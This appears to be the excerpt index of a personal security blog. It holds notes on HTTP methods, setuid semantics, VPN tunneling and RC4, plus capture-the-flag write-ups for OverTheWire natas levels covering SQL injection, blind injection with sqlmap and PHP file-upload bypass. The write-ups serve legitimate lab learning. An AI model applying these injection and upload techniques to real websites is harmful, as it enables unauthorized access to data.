Hack the world

GET：  request for data It has limited length  It can cache in the browser  POST： Used for change data, send data in the request. It doesn’t have limited length. The request is different, cannot have cache in the browser. For example, you can not place an order repeatedly 

seteuid:  when the calling process is not root :  Set the euid to real id or saved id, but not root(it doesn't have root capability) when the calling process is root: Change the euid, can be changed to root.(it has root capability) No mater the calling process is root or not, it can only change the euid.  setuid: when the calling process is not root :  Change the euid to real id or saved uid, but not root.(it doesn't have root capability). For example: it can change user1 to user2.  only change the euid. When the calling process is root: Change the real id and euid as arbitrary id.  Differences of setuid and seteuid : setuid will change all ids such as real id and euid, and saved user-id when the calling process is root. Once the real id is changed, when OS checks the real id and euid, they are found to be the same, so OS will not change to euid back to the real id, in other words, the euid was permanently changed. ...

Problem: find the flag in the file Step 1: when we receive the img file, we should do the following step as routine : 'binwalk-> strings-> exiftool' As we can see the metadata in FE01.jpg has a base64 cipher, that's suspicious. Step 2: then we decode it in the terminal, we can see that the plaintext are invisible characters.  Step 3: XOR brute force. The flag is 'follow_the_xor_brick_road'

VPN(virtual private network) How VPN works? Background: 3 properties of the packet user authenticated  content protected integrity preserved To achieve the goal, we have to encrypt the packet, but we cannot simply encrypt all the IP packet because the header will be encrypted so that the router cannot read the header of the packets and change the header(TTL and checksum). To solve this problem, we have IP tunneling.  IPSec Tunneling. Based on IP layer, and encapsulated the old IP packet into a new IP packet. This implement in the kernel. TLS/SSL Tunneling. Based on transport layer, and encapsulated inside a TCP or UDP packet. Both end of the tunnel utilize the TLS/SSL protocol on top of TCP/UDP. TLS/SSL is more popular because update application is much easier than update tha OS. What is tun/tap: tun is at layer 3 and tap is at layer 2, Ethernet.  TUN/TAP provides packet reception and transmission for user space programs ...

Problem: find the password of natas16. Tools: sqlmap The url of this problem is ' http://natas15.natas.labs.overthewire.org/ ' Step 1: view the source code Before view the source code, it looks like an SQL injection, I tried SQL injection, it only returns the user exists. View the source code. In the code, we found the reason why it just returns exist or not, and there is no code would show the password, so that SQL injection will not work. However, the code also give us some hint, there is a table names 'users' which contains password. Step 2:  Find the SQL vulnerability of the website:   Let's  say  that  you  are  auditing  a  web  application  and  found  a  web  page  that  accepts  dynamic  user provided  values  on  GET  or  POST  parameters  or  HTTP  Cookie  values  or  HTTP  User-Agent...

Problem: find the password of  natas15. The url of this problem is ' http://natas14.natas.labs.overthewire.org/ ' Step 1: view the source code As we can see that, the server will deliver the password if the SQL return data. Step 2: SQL injection  What we only need to do is to make the SQL query be true. The "#" means comment out the following condition.  PS: It's a simple SQL injection, but we have to pay attention to the source code to determine either it needs double quotation or single quotation

Problem: upload a JPEG file to find the password of natas14 Tool: Burp Suite, Bless the url of this problem is 'http://natas12.natas.labs.overthewire.org/' Upload Vulnerability:  Upload PHP instead of the JPEG file, the file will execute in the server. Step 1: view the source code <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://...

Problem: find the password of natas 12. the url of this problem is http://natas11.natas.labs.overthewire.org/ Step 1: understand the source code. <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script...

Problem: decrypt the cipher. Tool: crytool cipher: '1834e1b2170c2ac5212677e3ae48ed42c32810400afca21defab111bc7' which encrypted by 4-characters password How RC4 works? RC4 is a stream cipher and variable length key algorithm.  Plaintext does XOR with key stream to get the cipher, so that the key stream has the same length  as the plaintext. So how to get the key stream? First, initial array: Initial state vector S, s[0..255].  A key which is a password, like 'KEY', it should repeat many times to fill T with size 256. T[K,E,Y,K,E,Y,...]. Initial permuted vector S,  s[0..255] . Second, do calculate and swap to get a new Permuted vector S. Every element should be produced with the previous one. Third, get the key stream with as  the same length as plaintext. It also contains some calculation and swap. Last, make plaintext and key stream do XOR to get the cipher. Crack RC4 with brute force: It should be a forward-direction which means w...